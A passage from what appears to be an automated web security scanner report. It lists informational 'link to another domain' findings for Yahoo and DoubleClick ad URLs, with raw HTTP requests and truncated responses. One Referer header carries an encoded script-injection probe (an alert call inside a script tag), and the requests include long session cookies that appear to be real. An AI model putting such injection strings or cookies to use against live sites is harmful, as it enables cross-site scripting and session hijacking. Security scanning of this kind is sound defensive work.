myc_s=d=Wtj.dCltxKKWR4yTxWi_CK3zDanzRVsKt8DTB2lpWI7zMVkiUsHadtRStTpEf2RsPhasVOexjjcF3fz81XvE4v.yNYuR.GBV3cPfQnU6y43PvH.k2AvYVaLo6yGHHOPZ_i5zjaWFBSQYbKhiX1uhCJ0xeDhAMtG6oI7N.XbXIymy8mseSmCJsUYNs2mNZA8Goqd6V7dmAQCh8Q_XdMSK2MPjzSi5v9CxVU0xOGdctWAsRnIMBPMlRFIRUh9Lx6w.lVHACtjxiB2yGToCqNbOBzwZ03riMmj3SE3sTBH84TjPrB7FHlSAUgMKgYL3clY8oEm7paKqf6Zj67HH4_M5gyBuN4FWEl2mUxPFQBnmQNw5AxvsPEfL0cdWt2fQHScYCxq35XuSkrdvkguLFYc_qGcqYGms1Fe2astRxElVMYNZUZ83IqqIaOHg4M6eIPdJRMj7Pusdir7jwPYovRuNefvFE6udsriCVQv6Qt7WxzmNKyQU3N9Xdj.ynSmNVze_TvL9eSmDdo79VDZMMlESsS66SZxkqUW5dbw4eZsSTqx5Yx1Y07hoMy3jQGCQAwW3VTD7DOZJ_Xt1Wy9ajjwKT4YQsAs0K.fqYiAHouD2nm0oIN4CV2Xo5rjMEOoJPDgYRklno2hDpWfjVrYrxHfskmnAW5QVe1Dew4djLXyT.3lpSFKNHORIrn8xgUsFRQHGe3e3crKUO7_.lpAt_vki&v=2; MYTMI=8; MYTCK=AgBN9fAQAEmQEA5bQhAcKykQAEtfEABX5RAcfbgQDjXfEBxMJRAALUcQHG8IEA57Pw%3D%3D

Response

HTTP/1.1 200 OK
Date: Mon, 13 Jun 2011 13:11:10 GMT
P3P: policyref="http://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV"
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Cache-Control: private
Content-Length: 7314

<html><head>
<meta http-equiv="Content-Type" content="text/html;charset=UTF-8" />
<meta http-equiv="Cache-Control" content="no-cache" />
<meta http-equiv="Expires" content="Sat, 16 Nov 2002 00:00:01 G
...[SNIP]...
<noscript><img width=1 height=1 alt="" src="http://csc.beap.ad.yieldmanager.net/i?bv=1.0.0&bs=(12802onm2(gid$j6zt2GKL8NLm3NorTdAdCwgWrcHW8032DG4ADq8w,st$1307970670962477,v$1.0))&t=J-D"></noscript>
...[SNIP]...

18.186. http://my.yahoo.com/darla/fc.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://my.yahoo.com
Path:	/darla/fc.php

Issue detail

The page was loaded from a URL containing a query string:

http://my.yahoo.com/darla/fc.php?cb=YAHOO.ads.darla._loaded&p=my&f=150001785&l=LREC&en=utf-8&npv=1&rn=1307967070371

The response contains the following link to another domain:

http://csc.beap.ad.yieldmanager.net/i?bv=1.0.0&bs=(1288rpu7l(gid$eRlD4WKL8NLm3NorTdAdCwL4rcHW8031_l4ADENm,st$1307967070806776,v$1.0))&t=J-D

Request

GET /darla/fc.php?cb=YAHOO.ads.darla._loaded&p=my&f=150001785&l=LREC&en=utf-8&npv=1&rn=1307967070371 HTTP/1.1
Host: my.yahoo.com
Proxy-Connection: keep-alive
Referer: http://my.yahoo.com/;_ylt=AtqNTgBHv4UdcezC5xaY6tfTjdIF
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: B=edn6q5d6t078b&b=3&s=vv; CH=AgBN5uYQADlWEAA1WxAALXwQAC0hEAAhWRAAM70QADEpEAA6vhAABx4QABKh; myc=d=un3qpyo8OKG8Zlb4ckLdwXEz_01QrIULZYAJ2LRN8azJboqV7W6jRe8PMkWIB5WVpfGo0KHAdnWnVeCbiL5LTYlyzQiBbbTXgp2XjFniMsExNtuj_uZKSDfQbDDV2yrwKhKamUiZDW_8PN.RlQJY0mVjjdmF6FQWezl0xP4B_7C.zS68gqDgkcNseFdbOoJg_6pJ0P0aWJKmsuPdPQtVjRKelIKJsdV_yeEH5izEtOQMfK_QRAbA.6mQsWtnknm4v0LiIvfpsJodDAAmnX96HhB2a2PU9xNkdYsHx08Q7Iyo5cFvgsoSoyfz0kho_HOc5PzCtL5fQuHnixw0yaWVqXzwmprh8ep0&v=2; myc_s=d=zCnnyYVdNqFIU.3Dqhk5R0YGJjDyv3LLhul2gbHv70AbPyQ2FtLMR15PTO5Jvdl_CRFZiiBITmBcT0b5INiIgmNjscSro0nb2kCOPBtM5E_4.WgaaluKMhfhICINg0jnsTYiokS.M5Ug9pOxO2iVl_gMzRsxp4NW4jyairO7RcvP3JglBnvVXGmT0vX7cagLbtNq5jCnbzx8jsO3IEWzD.hyMKWCq4AqdPSLUfsfgXBaXZVAcsF3jmcRMCF25dMJCjp65xCIvB3vajB2eaRHdrFtMqbyASaZcblmtfwuXGG4oDoP6lW8ZHZQa0AbUhx6sanHlRaJwcrid3Gd8blBRegDQm3VundE8.99o3LaRbNmfyjjiKPwvqXibkvON7VoYc.fZIL855jQTtNv4YZmFUhaUVbr.MAr6W_ycV11KdmWJjVqixNdohcB2hEFAHYIxSj1ARj1wxcURmIUA4Z2CoX8FZiWiDF0ZBUoIwfaCv6PaOpK0bnBe5.n1qjdl1bRE_8LpLy6w9HHLVGP17pXJUbMAKucKbgX_FIMQhnKeqK7pcy0HW_yafioYPDSrtHii_a3EFAWvEaaM.94bkAH.hULOVSqwCgTBi2il.n1gDZO6HbHQ9qs6WwlJMV6ZrFxl9lJQXT8XqCIS1utCcv.S3M8YQRqJs0S6ywtMiPEddt3hGcnl4QmNLPQylP3kuW0CDQyYdCLbUbiCCsFeJt_&v=2; MYTMI=8; MYTCK=AgBN9fAQAEmQEA5bQhAOYXYQAEtfEABX5RAONd8QAC1HEA57Pw%3D%3D

Response

HTTP/1.1 200 OK
Date: Mon, 13 Jun 2011 12:11:10 GMT
P3P: policyref="http://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV"
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Cache-Control: private
Content-Length: 7313

<html><head>
<meta http-equiv="Content-Type" content="text/html;charset=UTF-8" />
<meta http-equiv="Cache-Control" content="no-cache" />
<meta http-equiv="Expires" content="Sat, 16 Nov 2002 00:00:01 G
...[SNIP]...
<noscript><img width=1 height=1 alt="" src="http://csc.beap.ad.yieldmanager.net/i?bv=1.0.0&bs=(1288rpu7l(gid$eRlD4WKL8NLm3NorTdAdCwL4rcHW8031_l4ADENm,st$1307967070806776,v$1.0))&t=J-D"></noscript>
...[SNIP]...

18.187. http://my.yahoo.com/darla/fc.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://my.yahoo.com
Path:	/darla/fc.php

Issue detail

The page was loaded from a URL containing a query string:

http://my.yahoo.com/darla/fc.php?cb=YAHOO.ads.darla._loaded&p=my&f=150001785&l=RQ&en=utf-8&npv=1&rn=1307970671641

The response contains the following link to another domain:

http://csc.beap.ad.yieldmanager.net/i?bv=1.0.0&bs=(128rgvbba(gid$niPRL2KL8NLm3NorTdAdCwmTrcHW8032DHAABSzG,st$1307970672340735,v$1.0))&t=J-D

Request

GET /darla/fc.php?cb=YAHOO.ads.darla._loaded&p=my&f=150001785&l=RQ&en=utf-8&npv=1&rn=1307970671641 HTTP/1.1
Host: my.yahoo.com
Proxy-Connection: keep-alive
Referer: http://my.yahoo.com/;_ylt=AtqNTgBHv4UdcezC5xaY6tfTjdIF
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: B=edn6q5d6t078b&b=3&s=vv; CH=AgBN5uYQADlWEAA1WxAALXwQAC0hEAAhWRAAM70QADEpEAA6vhAABx4QABKh; myc=d=un3qpyo8OKG8Zlb4ckLdwXEz_01QrIULZYAJ2LRN8azJboqV7W6jRe8PMkWIB5WVpfGo0KHAdnWnVeCbiL5LTYlyzQiBbbTXgp2XjFniMsExNtuj_uZKSDfQbDDV2yrwKhKamUiZDW_8PN.RlQJY0mVjjdmF6FQWezl0xP4B_7C.zS68gqDgkcNseFdbOoJg_6pJ0P0aWJKmsuPdPQtVjRKelIKJsdV_yeEH5izEtOQMfK_QRAbA.6mQsWtnknm4v0LiIvfpsJodDAAmnX96HhB2a2PU9xNkdYsHx08Q7Iyo5cFvgsoSoyfz0kho_HOc5PzCtL5fQuHnixw0yaWVqXzwmprh8ep0&v=2; myc_s=d=Wtj.dCltxKKWR4yTxWi_CK3zDanzRVsKt8DTB2lpWI7zMVkiUsHadtRStTpEf2RsPhasVOexjjcF3fz81XvE4v.yNYuR.GBV3cPfQnU6y43PvH.k2AvYVaLo6yGHHOPZ_i5zjaWFBSQYbKhiX1uhCJ0xeDhAMtG6oI7N.XbXIymy8mseSmCJsUYNs2mNZA8Goqd6V7dmAQCh8Q_XdMSK2MPjzSi5v9CxVU0xOGdctWAsRnIMBPMlRFIRUh9Lx6w.lVHACtjxiB2yGToCqNbOBzwZ03riMmj3SE3sTBH84TjPrB7FHlSAUgMKgYL3clY8oEm7paKqf6Zj67HH4_M5gyBuN4FWEl2mUxPFQBnmQNw5AxvsPEfL0cdWt2fQHScYCxq35XuSkrdvkguLFYc_qGcqYGms1Fe2astRxElVMYNZUZ83IqqIaOHg4M6eIPdJRMj7Pusdir7jwPYovRuNefvFE6udsriCVQv6Qt7WxzmNKyQU3N9Xdj.ynSmNVze_TvL9eSmDdo79VDZMMlESsS66SZxkqUW5dbw4eZsSTqx5Yx1Y07hoMy3jQGCQAwW3VTD7DOZJ_Xt1Wy9ajjwKT4YQsAs0K.fqYiAHouD2nm0oIN4CV2Xo5rjMEOoJPDgYRklno2hDpWfjVrYrxHfskmnAW5QVe1Dew4djLXyT.3lpSFKNHORIrn8xgUsFRQHGe3e3crKUO7_.lpAt_vki&v=2; MYTMI=8; MYTCK=AgBN9fAQAEmQEA5bQhAcKykQAEtfEABX5RAcfbgQDjXfEBxMJRAALUcQHG8IEA57Pw%3D%3D

Response

HTTP/1.1 200 OK
Date: Mon, 13 Jun 2011 13:11:12 GMT
P3P: policyref="http://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV"
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Cache-Control: private
Content-Length: 6436

<html><head>
<meta http-equiv="Content-Type" content="text/html;charset=UTF-8" />
<meta http-equiv="Cache-Control" content="no-cache" />
<meta http-equiv="Expires" content="Sat, 16 Nov 2002 00:00:01 G
...[SNIP]...
<noscript><img width=1 height=1 alt="" src="http://csc.beap.ad.yieldmanager.net/i?bv=1.0.0&bs=(128rgvbba(gid$niPRL2KL8NLm3NorTdAdCwmTrcHW8032DHAABSzG,st$1307970672340735,v$1.0))&t=J-D"></noscript>
...[SNIP]...

18.188. http://my.yahoo.com/darla/fc.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://my.yahoo.com
Path:	/darla/fc.php

Issue detail

The page was loaded from a URL containing a query string:

http://my.yahoo.com/darla/fc.php?cb=YAHOO.ads.darla._loaded&p=my&f=150001785&l=HB&en=utf-8&npv=1&rn=1307967068364

The response contains the following link to another domain:

http://csc.beap.ad.yieldmanager.net/i?bv=1.0.0&bs=(1282rbn3d(gid$yD0nlWKL8NLm3NorTdAdCwSercHW8031_l0ACGjW,st$1307967069552714,v$1.0))&t=J-D

Request

GET /darla/fc.php?cb=YAHOO.ads.darla._loaded&p=my&f=150001785&l=HB&en=utf-8&npv=1&rn=1307967068364 HTTP/1.1
Host: my.yahoo.com
Proxy-Connection: keep-alive
Referer: http://my.yahoo.com/;_ylt=AtqNTgBHv4UdcezC5xaY6tfTjdIF
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: B=edn6q5d6t078b&b=3&s=vv; CH=AgBN5uYQADlWEAA1WxAALXwQAC0hEAAhWRAAM70QADEpEAA6vhAABx4QABKh; myc=d=un3qpyo8OKG8Zlb4ckLdwXEz_01QrIULZYAJ2LRN8azJboqV7W6jRe8PMkWIB5WVpfGo0KHAdnWnVeCbiL5LTYlyzQiBbbTXgp2XjFniMsExNtuj_uZKSDfQbDDV2yrwKhKamUiZDW_8PN.RlQJY0mVjjdmF6FQWezl0xP4B_7C.zS68gqDgkcNseFdbOoJg_6pJ0P0aWJKmsuPdPQtVjRKelIKJsdV_yeEH5izEtOQMfK_QRAbA.6mQsWtnknm4v0LiIvfpsJodDAAmnX96HhB2a2PU9xNkdYsHx08Q7Iyo5cFvgsoSoyfz0kho_HOc5PzCtL5fQuHnixw0yaWVqXzwmprh8ep0&v=2; myc_s=d=zCnnyYVdNqFIU.3Dqhk5R0YGJjDyv3LLhul2gbHv70AbPyQ2FtLMR15PTO5Jvdl_CRFZiiBITmBcT0b5INiIgmNjscSro0nb2kCOPBtM5E_4.WgaaluKMhfhICINg0jnsTYiokS.M5Ug9pOxO2iVl_gMzRsxp4NW4jyairO7RcvP3JglBnvVXGmT0vX7cagLbtNq5jCnbzx8jsO3IEWzD.hyMKWCq4AqdPSLUfsfgXBaXZVAcsF3jmcRMCF25dMJCjp65xCIvB3vajB2eaRHdrFtMqbyASaZcblmtfwuXGG4oDoP6lW8ZHZQa0AbUhx6sanHlRaJwcrid3Gd8blBRegDQm3VundE8.99o3LaRbNmfyjjiKPwvqXibkvON7VoYc.fZIL855jQTtNv4YZmFUhaUVbr.MAr6W_ycV11KdmWJjVqixNdohcB2hEFAHYIxSj1ARj1wxcURmIUA4Z2CoX8FZiWiDF0ZBUoIwfaCv6PaOpK0bnBe5.n1qjdl1bRE_8LpLy6w9HHLVGP17pXJUbMAKucKbgX_FIMQhnKeqK7pcy0HW_yafioYPDSrtHii_a3EFAWvEaaM.94bkAH.hULOVSqwCgTBi2il.n1gDZO6HbHQ9qs6WwlJMV6ZrFxl9lJQXT8XqCIS1utCcv.S3M8YQRqJs0S6ywtMiPEddt3hGcnl4QmNLPQylP3kuW0CDQyYdCLbUbiCCsFeJt_&v=2; MYTMI=8; MYTCK=AgBN9fAQAEmQEA5bQhAOYXYQAEtfEABX5RAONd8QAC1HEA57Pw%3D%3D

Response

HTTP/1.1 200 OK
Date: Mon, 13 Jun 2011 12:11:09 GMT
P3P: policyref="http://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV"
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Cache-Control: private
Content-Length: 5839

<html><head>
<meta http-equiv="Content-Type" content="text/html;charset=UTF-8" />
<meta http-equiv="Cache-Control" content="no-cache" />
<meta http-equiv="Expires" content="Sat, 16 Nov 2002 00:00:01 G
...[SNIP]...
<noscript><img width=1 height=1 alt="" src="http://csc.beap.ad.yieldmanager.net/i?bv=1.0.0&bs=(1282rbn3d(gid$yD0nlWKL8NLm3NorTdAdCwSercHW8031_l0ACGjW,st$1307967069552714,v$1.0))&t=J-D"></noscript>
...[SNIP]...

18.189. http://my.yahoo.com/darla/fc.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://my.yahoo.com
Path:	/darla/fc.php

Issue detail

The page was loaded from a URL containing a query string:

http://my.yahoo.com/darla/fc.php?cb=YAHOO.ads.darla._loaded&p=my&f=150001785&l=RQ1&en=utf-8&npv=1&rn=1307967069370

The response contains the following link to another domain:

http://csc.beap.ad.yieldmanager.net/i?bv=1.0.0&bs=(12850ngbv(gid$vcx0o2KL8NLm3NorTdAdCwCprcHW8031_l4AAICn,st$1307967070040297,v$1.0))&t=J-D

Request

GET /darla/fc.php?cb=YAHOO.ads.darla._loaded&p=my&f=150001785&l=RQ1&en=utf-8&npv=1&rn=1307967069370 HTTP/1.1
Host: my.yahoo.com
Proxy-Connection: keep-alive
Referer: http://my.yahoo.com/;_ylt=AtqNTgBHv4UdcezC5xaY6tfTjdIF
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: B=edn6q5d6t078b&b=3&s=vv; CH=AgBN5uYQADlWEAA1WxAALXwQAC0hEAAhWRAAM70QADEpEAA6vhAABx4QABKh; myc=d=un3qpyo8OKG8Zlb4ckLdwXEz_01QrIULZYAJ2LRN8azJboqV7W6jRe8PMkWIB5WVpfGo0KHAdnWnVeCbiL5LTYlyzQiBbbTXgp2XjFniMsExNtuj_uZKSDfQbDDV2yrwKhKamUiZDW_8PN.RlQJY0mVjjdmF6FQWezl0xP4B_7C.zS68gqDgkcNseFdbOoJg_6pJ0P0aWJKmsuPdPQtVjRKelIKJsdV_yeEH5izEtOQMfK_QRAbA.6mQsWtnknm4v0LiIvfpsJodDAAmnX96HhB2a2PU9xNkdYsHx08Q7Iyo5cFvgsoSoyfz0kho_HOc5PzCtL5fQuHnixw0yaWVqXzwmprh8ep0&v=2; myc_s=d=zCnnyYVdNqFIU.3Dqhk5R0YGJjDyv3LLhul2gbHv70AbPyQ2FtLMR15PTO5Jvdl_CRFZiiBITmBcT0b5INiIgmNjscSro0nb2kCOPBtM5E_4.WgaaluKMhfhICINg0jnsTYiokS.M5Ug9pOxO2iVl_gMzRsxp4NW4jyairO7RcvP3JglBnvVXGmT0vX7cagLbtNq5jCnbzx8jsO3IEWzD.hyMKWCq4AqdPSLUfsfgXBaXZVAcsF3jmcRMCF25dMJCjp65xCIvB3vajB2eaRHdrFtMqbyASaZcblmtfwuXGG4oDoP6lW8ZHZQa0AbUhx6sanHlRaJwcrid3Gd8blBRegDQm3VundE8.99o3LaRbNmfyjjiKPwvqXibkvON7VoYc.fZIL855jQTtNv4YZmFUhaUVbr.MAr6W_ycV11KdmWJjVqixNdohcB2hEFAHYIxSj1ARj1wxcURmIUA4Z2CoX8FZiWiDF0ZBUoIwfaCv6PaOpK0bnBe5.n1qjdl1bRE_8LpLy6w9HHLVGP17pXJUbMAKucKbgX_FIMQhnKeqK7pcy0HW_yafioYPDSrtHii_a3EFAWvEaaM.94bkAH.hULOVSqwCgTBi2il.n1gDZO6HbHQ9qs6WwlJMV6ZrFxl9lJQXT8XqCIS1utCcv.S3M8YQRqJs0S6ywtMiPEddt3hGcnl4QmNLPQylP3kuW0CDQyYdCLbUbiCCsFeJt_&v=2; MYTMI=8; MYTCK=AgBN9fAQAEmQEA5bQhAOYXYQAEtfEABX5RAONd8QAC1HEA57Pw%3D%3D

Response

HTTP/1.1 200 OK
Date: Mon, 13 Jun 2011 12:11:10 GMT
P3P: policyref="http://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV"
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Cache-Control: private
Content-Length: 7113

<html><head>
<meta http-equiv="Content-Type" content="text/html;charset=UTF-8" />
<meta http-equiv="Cache-Control" content="no-cache" />
<meta http-equiv="Expires" content="Sat, 16 Nov 2002 00:00:01 G
...[SNIP]...
<noscript><img width=1 height=1 alt="" src="http://csc.beap.ad.yieldmanager.net/i?bv=1.0.0&bs=(12850ngbv(gid$vcx0o2KL8NLm3NorTdAdCwCprcHW8031_l4AAICn,st$1307967070040297,v$1.0))&t=J-D"></noscript>
...[SNIP]...

18.190. http://my.yahoo.com/darla/fc.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://my.yahoo.com
Path:	/darla/fc.php

Issue detail

The page was loaded from a URL containing a query string:

http://my.yahoo.com/darla/fc.php?cb=YAHOO.ads.darla._loaded&p=my&f=150001785&l=HB&en=utf-8&npv=1&rn=1307970668497

The response contains the following link to another domain:

http://csc.beap.ad.yieldmanager.net/i?bv=1.0.0&bs=(128fr725u(gid$KJh.BmKL8NLm3NorTdAdCwCdrcHW8032DGwADWrZ,st$1307970668879814,v$1.0))&t=J-D

Request

GET /darla/fc.php?cb=YAHOO.ads.darla._loaded&p=my&f=150001785&l=HB&en=utf-8&npv=1&rn=1307970668497 HTTP/1.1
Host: my.yahoo.com
Proxy-Connection: keep-alive
Referer: http://my.yahoo.com/;_ylt=AtqNTgBHv4UdcezC5xaY6tfTjdIF
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: B=edn6q5d6t078b&b=3&s=vv; CH=AgBN5uYQADlWEAA1WxAALXwQAC0hEAAhWRAAM70QADEpEAA6vhAABx4QABKh; myc=d=un3qpyo8OKG8Zlb4ckLdwXEz_01QrIULZYAJ2LRN8azJboqV7W6jRe8PMkWIB5WVpfGo0KHAdnWnVeCbiL5LTYlyzQiBbbTXgp2XjFniMsExNtuj_uZKSDfQbDDV2yrwKhKamUiZDW_8PN.RlQJY0mVjjdmF6FQWezl0xP4B_7C.zS68gqDgkcNseFdbOoJg_6pJ0P0aWJKmsuPdPQtVjRKelIKJsdV_yeEH5izEtOQMfK_QRAbA.6mQsWtnknm4v0LiIvfpsJodDAAmnX96HhB2a2PU9xNkdYsHx08Q7Iyo5cFvgsoSoyfz0kho_HOc5PzCtL5fQuHnixw0yaWVqXzwmprh8ep0&v=2; myc_s=d=Wtj.dCltxKKWR4yTxWi_CK3zDanzRVsKt8DTB2lpWI7zMVkiUsHadtRStTpEf2RsPhasVOexjjcF3fz81XvE4v.yNYuR.GBV3cPfQnU6y43PvH.k2AvYVaLo6yGHHOPZ_i5zjaWFBSQYbKhiX1uhCJ0xeDhAMtG6oI7N.XbXIymy8mseSmCJsUYNs2mNZA8Goqd6V7dmAQCh8Q_XdMSK2MPjzSi5v9CxVU0xOGdctWAsRnIMBPMlRFIRUh9Lx6w.lVHACtjxiB2yGToCqNbOBzwZ03riMmj3SE3sTBH84TjPrB7FHlSAUgMKgYL3clY8oEm7paKqf6Zj67HH4_M5gyBuN4FWEl2mUxPFQBnmQNw5AxvsPEfL0cdWt2fQHScYCxq35XuSkrdvkguLFYc_qGcqYGms1Fe2astRxElVMYNZUZ83IqqIaOHg4M6eIPdJRMj7Pusdir7jwPYovRuNefvFE6udsriCVQv6Qt7WxzmNKyQU3N9Xdj.ynSmNVze_TvL9eSmDdo79VDZMMlESsS66SZxkqUW5dbw4eZsSTqx5Yx1Y07hoMy3jQGCQAwW3VTD7DOZJ_Xt1Wy9ajjwKT4YQsAs0K.fqYiAHouD2nm0oIN4CV2Xo5rjMEOoJPDgYRklno2hDpWfjVrYrxHfskmnAW5QVe1Dew4djLXyT.3lpSFKNHORIrn8xgUsFRQHGe3e3crKUO7_.lpAt_vki&v=2; MYTMI=8; MYTCK=AgBN9fAQAEmQEA5bQhAcKykQAEtfEABX5RAcfbgQDjXfEBxMJRAALUcQHG8IEA57Pw%3D%3D

Response

HTTP/1.1 200 OK
Date: Mon, 13 Jun 2011 13:11:08 GMT
P3P: policyref="http://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV"
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Cache-Control: private
Content-Length: 5841

<html><head>
<meta http-equiv="Content-Type" content="text/html;charset=UTF-8" />
<meta http-equiv="Cache-Control" content="no-cache" />
<meta http-equiv="Expires" content="Sat, 16 Nov 2002 00:00:01 G
...[SNIP]...
<noscript><img width=1 height=1 alt="" src="http://csc.beap.ad.yieldmanager.net/i?bv=1.0.0&bs=(128fr725u(gid$KJh.BmKL8NLm3NorTdAdCwCdrcHW8032DGwADWrZ,st$1307970668879814,v$1.0))&t=J-D"></noscript>
...[SNIP]...

18.191. http://n4403ad.doubleclick.net/adj/gn.sk.tvfanatic.com/ros previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://n4403ad.doubleclick.net
Path:	/adj/gn.sk.tvfanatic.com/ros

Issue detail

The page was loaded from a URL containing a query string:

http://n4403ad.doubleclick.net/adj/gn.sk.tvfanatic.com/ros;sect=ros;sz=160x600;tile=3;ord=2873029240040514.5?

The response contains the following link to another domain:

http://s0.2mdn.net/2552481/160x600-Trojan_Giveaway.jpg

Request

GET /adj/gn.sk.tvfanatic.com/ros;sect=ros;sz=160x600;tile=3;ord=2873029240040514.5? HTTP/1.1
Host: n4403ad.doubleclick.net
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.tvfanatic.com/favicon.ico7a1b0%22%3e%3cscript%3ealert(%22FAVICON%22)%3c/script%3e15dca0967be/
Cookie: id=c60bd0733000097|3226301/1106615/15127,3149839/1069411/15111,2258832/785797/15105|t=1297260501|et=730|cs=g_qf15ye; rsi_segs=E11178_10001

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 1764
Date: Mon, 13 Jun 2011 11:27:45 GMT

document.write('\n\n\n');

var bumper = "None";
if(bumper == "Buildabe
...[SNIP]...
0/1%3B%3B%7Eokv%3D%3Bsect%3Dros%3Bsz%3D160x600%3Btile%3D3%3B%7Eaopt%3D2/1/83/0%3B%7Esscs%3D%3f'+bumper_url+'http://www.sheknows.com/contests/giveaway/500-spice-up-your-summer-giveaway" target="_blank"><img border="0" src="http://s0.2mdn.net/2552481/160x600-Trojan_Giveaway.jpg" height="600" width="160"></a>
...[SNIP]...

18.192. http://n4403ad.doubleclick.net/adj/gn.sk.tvfanatic.com/ros previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://n4403ad.doubleclick.net
Path:	/adj/gn.sk.tvfanatic.com/ros

Issue detail

The page was loaded from a URL containing a query string:

http://n4403ad.doubleclick.net/adj/gn.sk.tvfanatic.com/ros;sect=ros;sz=160x600;tile=4;ord=980936388950794.9?

The response contains the following link to another domain:

http://view.atdmt.com/MSR/view/313679802/direct;wi.160;hi.600/01/6942356

Request

GET /adj/gn.sk.tvfanatic.com/ros;sect=ros;sz=160x600;tile=4;ord=980936388950794.9? HTTP/1.1
Host: n4403ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.tvfanatic.com/2011/06/game-of-thrones-review-baelor/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3|2588783/907846/15127,1365243/360598/15115,690333/262595/15114|t=1305367759|et=730|cs=002213fd482cdcbface2418698

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 1405
Date: Mon, 13 Jun 2011 11:18:28 GMT

document.write('<iframe src=\"http://view.atdmt.com/MSR/iview/313679802/direct;wi.160;hi.600/01/6942356?click=http://n4403ad.doubleclick.net/click%3Bh%3Dv8/3b25/3/0/%2a/h%3B240399958%3B0-0%3B0%3B39168
...[SNIP]...
